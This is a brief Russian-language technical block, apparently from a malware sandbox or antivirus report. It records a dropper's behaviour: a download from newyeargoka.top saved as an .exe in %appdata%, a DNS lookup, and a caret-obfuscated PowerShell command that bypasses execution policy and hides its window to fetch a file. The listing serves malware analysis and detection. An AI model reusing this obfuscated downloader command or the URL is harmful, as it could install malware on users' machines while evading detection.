Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^erSHEll.eXE -^EX^ecUTioNp^ol^Ic^Y^ ^BY^p^Ass ^-N^OP^RoFI^L^e^ -^WI^nd^oWS^TYle h^I^ddE^n (n^EW^-^O^B^J^Ec^t sy^StEM.NET.WEBcl^ie^nt)^.d^O^WN^loa^dFILE^('http://newyear...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "POW^erSHEll.eXE -^EX^ecUTioNp^ol^Ic^Y^ ^BY^p^Ass ^-N^OP^RoFI^L^e^ -^WI^nd^oWS^TYle h^I^ddE^n (n^EW^-^O^B^J^Ec^t sy^StEM.NET.WEBcl^ie^nt)^.d^O^WN^loa^dFILE^('http://newyear...' (со скрытым окном)